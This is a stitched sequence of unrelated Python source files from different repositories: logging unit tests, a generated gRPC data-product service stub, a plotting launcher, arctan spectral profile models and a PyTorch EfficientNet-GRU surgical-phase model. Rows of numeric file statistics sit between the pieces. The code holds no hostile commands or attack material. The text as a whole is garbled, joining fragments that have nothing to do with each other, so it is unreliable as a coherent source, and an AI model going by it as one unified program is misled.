self.assertEqual(test_data_in_log_file, compare_test_data_in_log_file)
def test_log_info_6(self):
func_name = sys._getframe().f_code.co_name
uuid = 'test_user'
dic = {
'case_id': 'test1',
'activity': 'testing_log_info_6',
}
thread_id = 1
test_data_in_log_file = ''
compare_test_data_in_log_file = "INFO test_user test_log_info_6 Thread:1 Case_id:test1 Activity:testing_" \
"log_info_6 " \
"'Testing logging info with 6 arguments'"
ClientLogging().log_info(func_name, uuid, thread_id, dic['case_id'], dic['activity'], "Testing logging info with 6 "
"arguments")
with open(CLIENT_LOG_PATH, 'r') as f:
lines = f.read().splitlines()
test_data_in_log_file = lines[-1]
test_data_in_log_file = ' '.join(test_data_in_log_file.split(' ')[3:])
print(test_data_in_log_file)
print(compare_test_data_in_log_file)
self.assertEqual(test_data_in_log_file, compare_test_data_in_log_file)
def test_log_error_2(self):
func_name = sys._getframe().f_code.co_name
test_data_in_log_file = ''
compare_test_data_in_log_file = "ERROR Username:Unknown test_log_error_2 'Testing logging error with 2 arguments'"
ClientLogging().log_error(func_name, "Testing logging error with 2 arguments")
with open(CLIENT_LOG_PATH, 'r') as f:
lines = f.read().splitlines()
test_data_in_log_file = lines[-1]
test_data_in_log_file = ' '.join(test_data_in_log_file.split(' ')[3:])
print(test_data_in_log_file)
print(compare_test_data_in_log_file)
self.assertEqual(test_data_in_log_file, compare_test_data_in_log_file)
def test_log_error_3(self):
func_name = sys._getframe().f_code.co_name
uuid = 'test_user'
test_data_in_log_file = ''
compare_test_data_in_log_file = "ERROR test_user test_log_error_3 'Testing logging error with 3 arguments'"
ClientLogging().log_error(func_name, uuid, "Testing logging error with 3 arguments")
with open(CLIENT_LOG_PATH, 'r') as f:
lines = f.read().splitlines()
test_data_in_log_file = lines[-1]
test_data_in_log_file = ' '.join(test_data_in_log_file.split(' ')[3:])
print(test_data_in_log_file)
print(compare_test_data_in_log_file)
self.assertEqual(test_data_in_log_file, compare_test_data_in_log_file)
def test_log_error_5(self):
func_name = sys._getframe().f_code.co_name
uuid = 'test_user'
dic = {
'case_id': 'test1',
'activity': 'testing_log_info_5',
}
test_data_in_log_file = ''
compare_test_data_in_log_file = "ERROR test_user test_log_error_5 Case_id:test1 Activity:testing_log_info_5 " \
"'Testing logging error with 5 arguments'"
ClientLogging().log_error(func_name, uuid, dic['case_id'], dic['activity'], "Testing logging error with 5 "
"arguments")
with open(CLIENT_LOG_PATH, 'r') as f:
lines = f.read().splitlines()
test_data_in_log_file = lines[-1]
test_data_in_log_file = ' '.join(test_data_in_log_file.split(' ')[3:])
print(test_data_in_log_file)
print(compare_test_data_in_log_file)
self.assertEqual(test_data_in_log_file, compare_test_data_in_log_file)
def test_log_error_6(self):
func_name = sys._getframe().f_code.co_name
uuid = 'test_user'
dic = {
'case_id': 'test1',
'activity': 'testing_log_info_6',
}
thread_id = 1
test_data_in_log_file = ''
compare_test_data_in_log_file = "ERROR test_user test_log_error_6 Thread:1 Case_id:test1 Activity:testing_" \
"log_info_6 " \
"'Testing logging error with 6 arguments'"
ClientLogging().log_error(func_name, uuid, thread_id, dic['case_id'], dic['activity'],
"Testing logging error with 6 "
"arguments")
with open(CLIENT_LOG_PATH, 'r') as f:
lines = f.read().splitlines()
test_data_in_log_file = lines[-1]
test_data_in_log_file = ' '.join(test_data_in_log_file.split(' ')[3:])
print(test_data_in_log_file)
print(compare_test_data_in_log_file)
self.assertEqual(test_data_in_log_file, compare_test_data_in_log_file)
if __name__ == '__main__':
unittest.main()
| 49.629139 | 124 | 0.616894 | 1,012 | 7,494 | 4.083004 | 0.060277 | 0.1394 | 0.17425 | 0.226525 | 0.937803 | 0.937803 | 0.869797 | 0.821152 | 0.821152 | 0.816796 | 0 | 0.012794 | 0.290766 | 7,494 | 150 | 125 | 49.96 | 0.764628 | 0 | 0 | 0.710145 | 0 | 0 | 0.182813 | 0.007206 | 0 | 0 | 0 | 0 | 0.057971 | 1 | 0.057971 | false | 0 | 0.028986 | 0 | 0.094203 | 0.115942 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d965e6ac9d1098adcd6e34c3a7fa9b0826426cdf | 12,265 | py | Python | lang/python/github/com/metaprov/modelaapi/services/dataproduct/v1/dataproduct_pb2_grpc.py | metaprov/modeldapi | ee05693832051dcd990ee4f061715d7ae0787340 | [
"Apache-2.0"
] | 5 | 2022-02-18T03:40:10.000Z | 2022-03-01T16:11:24.000Z | lang/python/github/com/metaprov/modelaapi/services/dataproduct/v1/dataproduct_pb2_grpc.py | metaprov/modeldapi | ee05693832051dcd990ee4f061715d7ae0787340 | [
"Apache-2.0"
] | 1 | 2022-01-07T19:59:25.000Z | 2022-02-04T01:21:14.000Z | lang/python/github/com/metaprov/modelaapi/services/dataproduct/v1/dataproduct_pb2_grpc.py | metaprov/modeldapi | ee05693832051dcd990ee4f061715d7ae0787340 | [
"Apache-2.0"
] | 1 | 2022-03-25T10:21:43.000Z | 2022-03-25T10:21:43.000Z | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from github.com.metaprov.modelaapi.services.dataproduct.v1 import dataproduct_pb2 as github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2
class DataProductServiceStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.ListDataProducts = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService/ListDataProducts',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.ListDataProductsRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.ListDataProductsResponse.FromString,
)
self.CreateDataProduct = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService/CreateDataProduct',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.CreateDataProductRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.CreateDataProductResponse.FromString,
)
self.GetDataProduct = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService/GetDataProduct',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.GetDataProductRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.GetDataProductResponse.FromString,
)
self.UpdateDataProduct = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService/UpdateDataProduct',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.UpdateDataProductRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.UpdateDataProductResponse.FromString,
)
self.DeleteDataProduct = channel.unary_unary(
'/github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService/DeleteDataProduct',
request_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.DeleteDataProductRequest.SerializeToString,
response_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.DeleteDataProductResponse.FromString,
)
class DataProductServiceServicer(object):
"""Missing associated documentation comment in .proto file."""
def ListDataProducts(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateDataProduct(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetDataProduct(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateDataProduct(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteDataProduct(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_DataProductServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'ListDataProducts': grpc.unary_unary_rpc_method_handler(
servicer.ListDataProducts,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.ListDataProductsRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.ListDataProductsResponse.SerializeToString,
),
'CreateDataProduct': grpc.unary_unary_rpc_method_handler(
servicer.CreateDataProduct,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.CreateDataProductRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.CreateDataProductResponse.SerializeToString,
),
'GetDataProduct': grpc.unary_unary_rpc_method_handler(
servicer.GetDataProduct,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.GetDataProductRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.GetDataProductResponse.SerializeToString,
),
'UpdateDataProduct': grpc.unary_unary_rpc_method_handler(
servicer.UpdateDataProduct,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.UpdateDataProductRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.UpdateDataProductResponse.SerializeToString,
),
'DeleteDataProduct': grpc.unary_unary_rpc_method_handler(
servicer.DeleteDataProduct,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.DeleteDataProductRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.DeleteDataProductResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class DataProductService(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def ListDataProducts(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService/ListDataProducts',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.ListDataProductsRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.ListDataProductsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateDataProduct(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService/CreateDataProduct',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.CreateDataProductRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.CreateDataProductResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetDataProduct(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService/GetDataProduct',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.GetDataProductRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.GetDataProductResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateDataProduct(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService/UpdateDataProduct',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.UpdateDataProductRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.UpdateDataProductResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteDataProduct(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataproduct.v1.DataProductService/DeleteDataProduct',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.DeleteDataProductRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataproduct_dot_v1_dot_dataproduct__pb2.DeleteDataProductResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 61.633166 | 183 | 0.754015 | 1,233 | 12,265 | 7.000811 | 0.089213 | 0.100556 | 0.043095 | 0.053869 | 0.882762 | 0.882762 | 0.882762 | 0.855306 | 0.84152 | 0.809546 | 0 | 0.007525 | 0.187362 | 12,265 | 198 | 184 | 61.944444 | 0.858533 | 0.055932 | 0 | 0.493827 | 1 | 0 | 0.11172 | 0.084681 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074074 | false | 0 | 0.012346 | 0.030864 | 0.135802 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d992b71eb981482a81f42333231912a3a812f479 | 496 | py | Python | python/analyzer.py | MPinna/epidemic_broadcast | c8c2cbe9c6398c7ed3a68749892b438bceca629a | [
"MIT"
] | null | null | null | python/analyzer.py | MPinna/epidemic_broadcast | c8c2cbe9c6398c7ed3a68749892b438bceca629a | [
"MIT"
] | null | null | null | python/analyzer.py | MPinna/epidemic_broadcast | c8c2cbe9c6398c7ed3a68749892b438bceca629a | [
"MIT"
] | null | null | null | import subprocess
#print all pki plots, multithread run
subprocess.Popen(["python", "plots.py", 'duration (s)' ,"median" ,"0.95"])
subprocess.Popen(["python", "plots.py", 'duration (s)' ,"mean" ,"0.95"])
subprocess.Popen(["python", "plots.py", 'collisions' ,"median" ,"0.95"])
subprocess.Popen(["python", "plots.py", 'collisions' ,"mean" ,"0.95"])
subprocess.Popen(["python", "plots.py", 'coverage (%)' ,"median" ,"0.95"])
subprocess.Popen(["python", "plots.py", 'coverage (%)' ,"mean" ,"0.95"]) | 55.111111 | 74 | 0.637097 | 64 | 496 | 4.9375 | 0.296875 | 0.28481 | 0.398734 | 0.493671 | 0.832278 | 0.832278 | 0.832278 | 0.686709 | 0 | 0 | 0 | 0.039648 | 0.084677 | 496 | 9 | 75 | 55.111111 | 0.656388 | 0.072581 | 0 | 0 | 0 | 0 | 0.447826 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7951a3a63ef8b1e1c3cab3782b242a9784ccd584 | 5,632 | py | Python | src/modelSuite/atanProfile.py | mirofedurco/PyAstronomy | b0e5806a18bde647654e6c9de323327803722864 | [
"MIT"
] | 98 | 2015-01-01T12:46:05.000Z | 2022-02-13T14:17:36.000Z | src/modelSuite/atanProfile.py | mirofedurco/PyAstronomy | b0e5806a18bde647654e6c9de323327803722864 | [
"MIT"
] | 46 | 2015-02-10T19:53:38.000Z | 2022-01-11T17:26:05.000Z | src/modelSuite/atanProfile.py | mirofedurco/PyAstronomy | b0e5806a18bde647654e6c9de323327803722864 | [
"MIT"
] | 38 | 2015-01-08T17:00:34.000Z | 2022-03-04T05:15:22.000Z | from __future__ import print_function, division
from PyAstronomy import funcFit as fuf
import numpy as np
class AtanProfile(fuf.OneDFit):
"""
A profile based on the arc tangent function.
This class implements the following profile:
.. math::
f(x) = \\frac{A}{2\\arctan(\\sigma)} \\times \\left(\\arctan\\left(\\frac{x-\mu}{scale} + \sigma\\right) +
\\arctan\\left(-\\frac{x-\mu}{scale} + \sigma\\right)\\right) +
\mu \\times x + off
which can provide a relatively flat top and steep edges.
*Fit parameters*
- `A` - The amplitude. In this case, the height (not the area under)
the profile reached for :math:`x=0`. Note that for
:math:`\mu \\not = 0` the highest point may be elsewhere,
which is neglected here.
- `scale` - A scale parameter affecting the width of the profile. Note,
however, that also :math:`\sigma` affects the width.
- `mu` - The center of the profile.
- `off` - An offset
- `lin` - A gradient in the offset.
The width of the profile may be approximated by the inflection points, which
are given by
.. math::
\\frac{\\partial^2 f(x)}{\partial x^2} = 0 \\rightarrow
x_{1,2} = \mu \\pm\\frac{scale}{3}\\left(-3+3\sigma^2+6\\sqrt{\sigma^4+\sigma^2+1}\\right)^{1/2}
"""
def __init__(self):
fuf.OneDFit.__init__(self, ["scale", "sig", "mu", "A", "off", "lin"])
def evaluate(self, x):
"""
Calculates and returns model according to the
current parameter values.
Parameters
----------
x : Array
The positions at which to evaluate the model.
"""
# Shift by mu
x = x - self["mu"]
# The heart of the profile
y = np.arctan(x/self["scale"] + self["sig"]) + np.arctan(-x/self["scale"] + self["sig"])
# Make the highest point (actually most extreme point)
# equal to A
y *= (self["A"] / (2.*np.arctan(self["sig"])))
# Add offset and gradient
y += self["off"]
y += self["lin"] * (x + self["mu"])
return y
def inflectionPoints(self):
"""
Calculate the inflection points.
The inflection points of the profile depend on
both :math:`\sigma` and :math:`\mu`.
Returns
-------
Inflection points : tuple
Locations of the inflection points. Smaller one first.
"""
d = abs(self["scale"])/3.0 * \
np.sqrt(-3. + 3.*self["sig"]**2 + 6.*np.sqrt(self["sig"]**4 + self["sig"]**2 + 1.0))
return self["mu"]-d, self["mu"]+d
class AtanProfileDamped(fuf.OneDFit):
"""
A profile based on the arc tangent function.
This class implements the following profile:
.. math::
d(x) = f(x) \\times H(|x-\mu| - |ifp-\mu|) \\times
\\exp\\left(\\frac{|x-\mu| - |ifp-\mu|}{\\tau}\\right) +
\mu \\times x + off
Here :math:`f(x)` is the profile described in :py:class:`AtanProfile`,
H denotes the Heaviside function, and ifp is the location of the
inflection point. The parameter :math:`\\tau` can be used to provide
an additional drop at the edges of the profile.
*Fit parameters*
- `A` - The amplitude. In this case, the height (not the area under)
the profile reached for :math:`x=0`. Note that for
:math:`\mu \\not = 0` the highest point may be elsewhere,
which is neglected here.
- `scale` - A scale parameter affecting the width of the profile. Note,
however, that also :math:`\sigma` affects the width.
- `tau` - This parameter controls an additional drop at the edges
of the profile.
- `mu` - The center of the profile.
- `off` - An offset
- `lin` - A gradient in the offset.
The width of the profile may be approximated by the inflection points, which
are given by
.. math::
\\frac{\\partial^2 f(x)}{\partial x^2} = 0 \\rightarrow
x_{1,2} = \mu \\pm\\frac{scale}{3}\\left(-3+3\sigma^2+6\\sqrt{\sigma^4+\sigma^2+1}\\right)^{1/2}
"""
def __init__(self):
fuf.OneDFit.__init__(self, ["scale", "sig", "mu", "A", "off", "lin", "tau"])
def evaluate(self, x):
"""
Calculates and returns model according to the
current parameter values.
Parameters
----------
x : Array
The positions at which to evaluate the model.
"""
# Shift by mu
x = x - self["mu"]
# The heart of the profile
y = np.arctan(x/self["scale"] + self["sig"]) + np.arctan(-x/self["scale"] + self["sig"])
# Make the highest point (actually most extreme point)
# equal to A
y *= (self["A"] / (2.*np.arctan(self["sig"])))
# Produce additional drop
difp = abs(self.inflectionPoints()[0] - self["mu"])
indi = np.where(np.abs(x) > difp)[0]
y[indi] *= np.exp(-np.abs(np.abs(x[indi])-difp)**2/self["tau"])
# Add offset and gradient
y += self["off"]
y += self["lin"] * (x + self["mu"])
return y
def inflectionPoints(self):
"""
Calculate the inflection points.
The inflection points of the profile depend on
both :math:`\sigma` and :math:`\mu`.
Returns
-------
Inflection points : tuple
Locations of the inflection points. Smaller one first.
"""
d = abs(self["scale"])/3.0 * \
np.sqrt(-3. + 3.*self["sig"]**2 + 6.*np.sqrt(self["sig"]**4 + self["sig"]**2 + 1.0))
return self["mu"]-d, self["mu"]+d | 33.927711 | 112 | 0.558416 | 778 | 5,632 | 4.012853 | 0.191517 | 0.048046 | 0.046124 | 0.016656 | 0.827675 | 0.817425 | 0.817425 | 0.817425 | 0.796925 | 0.772582 | 0 | 0.014866 | 0.283381 | 5,632 | 166 | 113 | 33.927711 | 0.758672 | 0.622869 | 0 | 0.705882 | 0 | 0 | 0.087786 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.176471 | false | 0 | 0.088235 | 0 | 0.441176 | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
eb4e1b88cc0ec4d984ae0e3187b049eec2c28c68 | 42 | py | Python | overpass/config/__init__.py | eyeem/overpass | 40e28dbe7258360e0b04b4e48bd107eca827899d | [
"Apache-2.0"
] | null | null | null | overpass/config/__init__.py | eyeem/overpass | 40e28dbe7258360e0b04b4e48bd107eca827899d | [
"Apache-2.0"
] | 1 | 2021-04-30T21:11:32.000Z | 2021-04-30T21:11:32.000Z | overpass/config/__init__.py | eyeem/overpass | 40e28dbe7258360e0b04b4e48bd107eca827899d | [
"Apache-2.0"
] | null | null | null | from overpass.config.config import CONFIG
| 21 | 41 | 0.857143 | 6 | 42 | 6 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095238 | 42 | 1 | 42 | 42 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 1 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
ebaa64afa1d1136b257fc3ce7454151878a46e8b | 3,991 | py | Python | pytorch-sandbox/model/model.py | doughtmw/surgeon-assist-net | 39fe619b18e888cc6395f8cd254060c169c9d3fd | [
"MIT"
] | 12 | 2021-07-15T09:52:11.000Z | 2022-02-22T06:35:11.000Z | pytorch-sandbox/model/model.py | doughtmw/surgeon-assist-net | 39fe619b18e888cc6395f8cd254060c169c9d3fd | [
"MIT"
] | null | null | null | pytorch-sandbox/model/model.py | doughtmw/surgeon-assist-net | 39fe619b18e888cc6395f8cd254060c169c9d3fd | [
"MIT"
] | null | null | null | import numpy as np
import torch
import torch.nn as nn
import torch.nn.init as init
# Local imports
from utils.utils import count_parameters
def create_model(params):
feat_ext = str(params['feat_ext'])
if feat_ext == 'b0_lite':
print('Using effnet-lite b0 as feature extractor.')
return effnetb0_lite_rnn(params)
if feat_ext == 'b0':
print('Using effnet b0 as feature extractor.')
return effnetb0_rnn(params)
else:
print('No feature extraction backbone selected.')
return None
# EfficientNet-Lite-B0
class effnetb0_lite_rnn(torch.nn.Module):
def __init__(self, params):
super(effnetb0_lite_rnn, self).__init__()
self.img_size = params['img_size']
self.seq_len = params['seq_len']
self.hidden_size = params['hidden_size']
self.num_classes = params['num_classes']
# Feature extraction (no 1x1 conv layer, global pooling, dropout and fc head)
effnetb0 = torch.hub.load(
"rwightman/gen-efficientnet-pytorch",
"efficientnet_lite0",
pretrained=True,
exportable=True)
self.feat = torch.nn.Sequential(*list(effnetb0.children())[:-4])
self.avgpool = nn.AdaptiveAvgPool2d(1)
self.rnn = nn.GRU(input_size=1280, hidden_size=self.hidden_size, num_layers=1, batch_first=True)
# Prediction structure
self.pred = nn.Sequential(
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(self.hidden_size, self.num_classes))
# Initialize rnn weights
init.xavier_normal_(self.rnn.all_weights[0][0])
init.xavier_normal_(self.rnn.all_weights[0][1])
print('count_parameters(self.feat):', count_parameters(self.feat))
print('count_parameters(self.rnn):', count_parameters(self.rnn))
print('count_parameters(self.pred):', count_parameters(self.pred))
def forward(self, x):
x = x.view(-1, 3, self.img_size[0], self.img_size[1])
x = self.feat.forward(x)
x = self.avgpool(x)
x = x.view(-1, self.seq_len, 1280)
self.rnn.flatten_parameters()
y, _ = self.rnn(x)
y = y.contiguous().view(-1, self.hidden_size)
y = self.pred(y)
return y
# EfficientNet-B0
class effnetb0_rnn(torch.nn.Module):
def __init__(self, params):
super(effnetb0_rnn, self).__init__()
self.img_size = params['img_size']
self.seq_len = params['seq_len']
self.hidden_size = params['hidden_size']
self.num_classes = params['num_classes']
# Feature extraction (no 1x1 conv layer, global pooling, dropout and fc head)
effnetb0 = torch.hub.load(
"rwightman/gen-efficientnet-pytorch",
"efficientnet_b0",
pretrained=True,
exportable=True)
self.feat = torch.nn.Sequential(*list(effnetb0.children())[:-4])
self.avgpool = nn.AdaptiveAvgPool2d(1)
self.rnn = nn.GRU(input_size=1280, hidden_size=self.hidden_size, num_layers=1, batch_first=True)
# Prediction structure
self.pred = nn.Sequential(
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(self.hidden_size, self.num_classes))
# Initialize rnn weights
init.xavier_normal_(self.rnn.all_weights[0][0])
init.xavier_normal_(self.rnn.all_weights[0][1])
print('count_parameters(self.feat):', count_parameters(self.feat))
print('count_parameters(self.rnn):', count_parameters(self.rnn))
print('count_parameters(self.pred):', count_parameters(self.pred))
def forward(self, x):
x = x.view(-1, 3, self.img_size[0], self.img_size[1])
x = self.feat.forward(x)
x = self.avgpool(x)
x = x.view(-1, self.seq_len, 1280)
self.rnn.flatten_parameters()
y, _ = self.rnn(x)
y = y.contiguous().view(-1, self.hidden_size)
y = self.pred(y)
return y
| 34.405172 | 104 | 0.623152 | 526 | 3,991 | 4.538023 | 0.188213 | 0.041056 | 0.095517 | 0.060327 | 0.846251 | 0.846251 | 0.817763 | 0.817763 | 0.817763 | 0.817763 | 0 | 0.023364 | 0.249311 | 3,991 | 115 | 105 | 34.704348 | 0.773364 | 0.072663 | 0 | 0.738095 | 0 | 0 | 0.129268 | 0.063415 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059524 | false | 0 | 0.059524 | 0 | 0.202381 | 0.107143 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
69682dfbbcf519a85c247b80a0eecdd640d15f61 | 1,830 | py | Python | Network2/projects/project 3/test.py | mheidari98/_IUT | f684d31071512edeefe8c8405746d4f3eab6ab6b | [
"MIT"
] | 1 | 2021-07-10T19:52:38.000Z | 2021-07-10T19:52:38.000Z | Network2/projects/project 3/test.py | mheidari98/_IUT | f684d31071512edeefe8c8405746d4f3eab6ab6b | [
"MIT"
] | null | null | null | Network2/projects/project 3/test.py | mheidari98/_IUT | f684d31071512edeefe8c8405746d4f3eab6ab6b | [
"MIT"
] | null | null | null | #!/usr/bin/python3
n=3
k=1
